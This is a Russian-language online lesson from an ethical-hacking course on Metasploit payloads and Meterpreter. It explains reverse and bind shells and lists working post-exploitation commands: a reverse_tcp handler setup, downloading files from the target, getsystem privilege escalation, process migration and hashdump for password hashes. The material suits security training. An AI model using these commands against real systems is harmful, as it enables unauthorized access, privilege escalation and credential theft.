0Pricing
Ethical Hacking Academy · Урок

Полезные нагрузки и Meterpreter

Оболочка после эксплуатации

«Полезные нагрузки и Meterpreter» — бесплатный урок Ethical Hacking Academy на CoddyKit. Это урок 3 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Ethical Hacking Academy, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Ethical Hacking Academy содержит 4 уроков всего.

Что такое полезная нагрузка

Полезная нагрузка — это код, который выполняется на цели после успешного эксплойта. Она определяет, что Вы сможете делать дальше: от выполнения одной команды до открытия полноценной интерактивной оболочки.

Выбор подходящей полезной нагрузки зависит от ОС цели, сетевой конфигурации и необходимого уровня доступа.

Поэтапные и цельные полезные нагрузки

Полезные нагрузки используют два способа доставки:

  • Поэтапная (обратите внимание на / в meterpreter/reverse_tcp): сначала отправляется небольшая начальная часть, которая затем загружает полную полезную нагрузку. Начальный объём меньше.
  • Цельная (обратите внимание на _ в meterpreter_reverse_tcp): вся полезная нагрузка доставляется сразу. Это надёжнее в нестабильных сетях.

Привязываемые и обратные оболочки

Существуют два направления соединения:

  • Привязываемая оболочка: цель открывает порт и ожидает соединения, а Вы подключаетесь к ней. Такие соединения часто блокируются межсетевыми экранами.
  • Обратная оболочка: цель подключается обратно к Вам (LHOST/LPORT). Обычно такое соединение проходит через межсетевые экраны, разрешающие исходящий трафик.

По этой причине обратные полезные нагрузки обычно используются по умолчанию.

Знакомство с Meterpreter

Meterpreter — расширенная полезная нагрузка Metasploit. В отличие от простой командной оболочки, она работает в памяти, обменивается данными по зашифрованному каналу и предоставляет богатый набор команд для действий после эксплуатации.

Поскольку она не записывает данные на диск, она менее заметна, чем отдельный исполняемый файл.

Основные команды Meterpreter

Получив сеанс Meterpreter, начните с основных команд, которые помогут сориентироваться в цели.

sysinfo      # OS, architecture, hostname
getuid       # current user context
ps           # running processes
pwd  ls  cd  # filesystem navigation

Передача файлов

Meterpreter перемещает файлы между Вашим компьютером и целью с помощью простых команд. Это полезно для получения свидетельств или размещения инструментов во время санкционированных проверок.

download C:\\Users\\admin\\secret.txt /tmp/
upload /tmp/tool.exe C:\\Windows\\Temp\\

Переход к системной оболочке

Команда shell переводит Вас из Meterpreter во встроенный интерпретатор команд цели (cmd.exe или /bin/sh), когда необходимо напрямую выполнять команды ОС.

Введите exit, чтобы вернуться к приглашению Meterpreter, не теряя сеанс.

shell
# C:\> whoami
# exit  -> back to meterpreter

Повышение привилегий

Часто Вы получаете доступ с ограниченными привилегиями. Meterpreter помогает их повысить:

  • getsystem пытается применить известные методы для получения SYSTEM в Windows.
  • Модуль после эксплуатации local_exploit_suggester рекомендует эксплойты для локального повышения привилегий на узле.

Более высокие привилегии открывают доступ к извлечению учётных данных и более глубокому проникновению.

getsystem
run post/multi/recon/local_exploit_suggester

Перенос процессов

Ваш сеанс находится внутри процесса. Если этот процесс нестабилен или его, скорее всего, завершат, выполните перенос в более стабильный, длительно работающий процесс, чтобы сохранить сеанс активным.

Перенос в процесс, соответствующий Вашему уровню привилегий, также помогает не выделяться и может изменить контекст пользователя.

ps
migrate 1340     # migrate into a stable PID

Сохранение доступа

Meterpreter содержит функции для сбора полезных данных во время санкционированных проверок, например hashdump для получения хешей паролей и инструменты keyscan для демонстрации последствий перехвата ввода.

Используйте такие возможности только в согласованных рамках проверки и документируйте всё для отчёта клиента.

hashdump
run post/windows/gather/checkvm

Обработчики

Обратной полезной нагрузке требуется процесс, который будет прослушивать соединение с Вашей стороны. Эту роль выполняет модуль multi/handler. Настройте его с теми же полезной нагрузкой, LHOST и LPORT, которые использовались для создания полезной нагрузки.

Это особенно важно, когда Вы доставляете полезную нагрузку msfvenom за пределами консоли: сначала запустите обработчик, затем активируйте полезную нагрузку на цели.

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.14.2
set LPORT 4444
exploit -j

Быстрая проверка

Выберите полезную нагрузку, которая обходит ограничительный межсетевой экран.

Итоги

Вы изучили полезные нагрузки и Meterpreter:

  • Полезные нагрузки могут быть поэтапными (/) или цельными (_), а также привязываемыми или обратными; обратные обычно обходят межсетевые экраны.
  • Meterpreter работает в памяти через зашифрованный канал и предоставляет богатый набор команд.
  • Основные задачи: sysinfo, getuid, ps, download/upload, shell.
  • Повышайте привилегии с помощью getsystem и local_exploit_suggester; используйте migrate для стабильности.
  • Используйте функции сбора данных только в согласованных рамках и документируйте всё.

Далее: модули после эксплуатации, перемещение между сетями и сбор ценных данных.

Часто задаваемые вопросы

Урок «Полезные нагрузки и Meterpreter» бесплатный?

Да — полный текст урока «Полезные нагрузки и Meterpreter» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Ethical Hacking Academy, подпишись на CoddyKit PRO. Курс Ethical Hacking Academy содержит 4 уроков всего.

Чему я научусь в уроке «Полезные нагрузки и Meterpreter»?

Оболочка после эксплуатации Ты практикуешь Ethical Hacking Academy с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.

Нужен ли мне опыт, чтобы начать Ethical Hacking Academy?

Предыдущий опыт не требуется. Ethical Hacking Academy на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 3 из 4.

Сколько времени занимает урок «Полезные нагрузки и Meterpreter»?

Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.

Можно ли писать и запускать код в этом уроке Ethical Hacking Academy?

Да. Каждый урок Ethical Hacking Academy включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.

Все уроки этого курса

  1. Архитектура Metasploit
  2. Поиск и использование эксплойтов
  3. Полезные нагрузки и Meterpreter
  4. Модули постэксплуатации
← Назад к Ethical Hacking Academy